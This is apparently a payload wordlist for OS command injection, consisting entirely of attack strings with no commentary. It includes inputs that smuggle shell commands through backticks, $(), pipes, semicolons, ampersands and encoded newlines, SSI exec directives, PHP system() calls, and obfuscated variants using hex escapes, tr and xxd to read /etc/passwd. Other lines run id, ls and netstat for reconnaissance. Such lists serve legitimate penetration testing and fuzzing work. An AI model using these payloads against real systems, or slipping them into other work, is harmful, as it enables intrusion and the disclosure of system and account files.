`cat /etc/passwd`
$(cat /etc/passwd)
cat</etc/passwd
;system('cat%20/etc/passwd')
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
$(`cat /etc/passwd`)
;/bin/cat /etc/passwd
<!--#exec cmd="/bin/cat /etc/passwd"-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
id
|/usr/bin/id
||/usr/bin/id;
;|/usr/bin/id|
`/usr/bin/id`
%0Aid%0A
$;/usr/bin/id
`id`
|id
;id
;id|
& id
&&id
\nid
\nid;
' id
' & id
'; id
" id
" & id
dir
| dir
; dir
$(`dir`)
& dir
&&dir
| ls -l /
; ls -l /
& ls -l /etc/
&& ls -l /etc/
;netstat -a;
|netstat -an
;netstat -an
&netstat -an
&& netstat -an
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`